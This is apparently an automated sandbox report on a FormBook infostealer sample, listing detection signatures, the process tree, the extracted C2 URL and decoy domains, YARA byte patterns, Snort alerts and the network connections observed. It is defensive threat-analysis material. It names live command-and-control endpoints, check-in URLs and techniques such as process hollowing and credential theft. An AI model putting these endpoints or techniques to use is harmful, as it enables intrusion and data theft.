Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Noua lista de comenzi.exe

Overview

General Information

Sample Name:Noua lista de comenzi.exe
Analysis ID:562316
MD5:c6c9905431f32998369ba3fce5743a2b
SHA1:7523dc8923179973879c227ad1776ff583660e3d
SHA256:527036f9e449de86dc23ca03f80ea7da2d0ee7d7752203bbfad4ffb9237a19a8
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Noua lista de comenzi.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\Noua lista de comenzi.exe" MD5: C6C9905431F32998369BA3FCE5743A2B)
    • DpiScaling.exe (PID: 6556 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Tdfgwnfyyv.exe (PID: 1840 cmdline: "C:\Users\user\Contacts\Tdfgwnfyyv.exe" MD5: C6C9905431F32998369BA3FCE5743A2B)
          • logagent.exe (PID: 3032 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
        • Tdfgwnfyyv.exe (PID: 6780 cmdline: "C:\Users\user\Contacts\Tdfgwnfyyv.exe" MD5: C6C9905431F32998369BA3FCE5743A2B)
          • logagent.exe (PID: 6320 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
        • systray.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6292 cmdline: /c del "C:\Windows\SysWOW64\DpiScaling.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\Contacts\vyyfnwgfdT.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x57:$hotkey: \x0AHotKey=8
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\Contacts\vyyfnwgfdT.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
SourceRuleDescriptionAuthorStrings
0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 61 entries
      SourceRuleDescriptionAuthorStrings
      13.0.DpiScaling.exe.72480000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        13.0.DpiScaling.exe.72480000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        13.0.DpiScaling.exe.72480000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        22.0.logagent.exe.72480000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          22.0.logagent.exe.72480000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 85 entries

          System Summary

          barindex
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Users\user\Contacts\vyyfnwgfdT.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Noua lista de comenzi.exe, ProcessId: 6848, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Tdfgwnfyyv

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
          Source: Noua lista de comenzi.exeVirustotal: Detection: 32%Perma Link
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.cielotherepy.com/euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTPAvira URL Cloud: Label: malware
          Source: http://www.ahmadfaizlajis.com/euv4/Avira URL Cloud: Label: malware
          Source: http://www.anniebapartments.com/euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9Avira URL Cloud: Label: malware
          Source: http://www.alifdanismanlik.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4LehsAvira URL Cloud: Label: malware
          Source: http://www.rematedeldia.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMtAvira URL Cloud: Label: malware
          Source: www.rematedeldia.com/euv4/Avira URL Cloud: Label: malware
          Source: http://www.the-pumps.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsUAvira URL Cloud: Label: malware
          Source: http://www.bendyourtongue.com/euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9Avira URL Cloud: Label: malware
          Source: Noua lista de comenzi.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeJoe Sandbox ML: detected
          Source: 22.2.logagent.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 25.0.logagent.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 22.0.logagent.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 25.0.logagent.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.0.DpiScaling.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.2.systray.exe.4ae796c.4.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 25.2.logagent.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 22.0.logagent.exe.72480000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.0.DpiScaling.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.0.DpiScaling.exe.72480000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.DpiScaling.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 22.0.logagent.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 22.0.logagent.exe.72480000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 25.0.logagent.exe.72480000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.0.DpiScaling.exe.72480000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 25.0.logagent.exe.72480000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 20.2.systray.exe.193198.1.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: Noua lista de comenzi.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49749 version: TLS 1.2
          Source: Binary string: systray.pdb source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: DpiScaling.exe, 0000000D.00000002.443630865.0000000000650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, DpiScaling.exe, 0000000D.00000002.445684941.00000000045E0000.00000040.00000800.00020000.00000000.sdmp, DpiScaling.exe, 0000000D.00000002.447244201.00000000046FF000.00000040.00000800.00020000.00000000.sdmp, systray.exe, systray.exe, 00000014.00000002.811879967.0000000004490000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812401712.00000000045AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.477462244.0000000004A3F000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000016.00000002.475842271.0000000004920000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000019.00000002.481489671.0000000004A40000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: DpiScaling.pdb source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: systray.exe, 00000014.00000002.810319814.0000000000193000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000014.00000002.812850284.0000000004AE7000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi

          Networking

          barindex
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 192.0.78.240:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 192.0.78.240:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 192.0.78.240:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49818 -> 157.90.247.57:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49818 -> 157.90.247.57:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49818 -> 157.90.247.57:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 206.188.193.90:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 206.188.193.90:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 206.188.193.90:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 162.0.214.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 162.0.214.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 162.0.214.189:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49826 -> 52.89.53.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49826 -> 52.89.53.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49826 -> 52.89.53.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49827 -> 162.0.214.189:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49827 -> 162.0.214.189:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49827 -> 162.0.214.189:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49833 -> 34.102.136.180:80
          Source: C:\Windows\explorer.exeDomain query: www.alert78.info
          Source: C:\Windows\explorer.exeDomain query: www.bestpleasure4u.com
          Source: C:\Windows\explorer.exeDomain query: www.pkem.top
          Source: C:\Windows\explorer.exeDomain query: www.awp.email
          Source: C:\Windows\explorer.exeDomain query: www.librairie-adrienne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.alifdanismanlik.com
          Source: C:\Windows\explorer.exeDomain query: www.bendyourtongue.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.169 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.90.64.134 80
          Source: C:\Windows\explorer.exeDomain query: www.handejqr.com
          Source: C:\Windows\explorer.exeDomain query: www.protection-onepa.com
          Source: C:\Windows\explorer.exeDomain query: www.fabio.tools
          Source: C:\Windows\explorer.exeNetwork Connect: 34.90.73.145 80
          Source: C:\Windows\explorer.exeNetwork Connect: 157.90.247.57 80
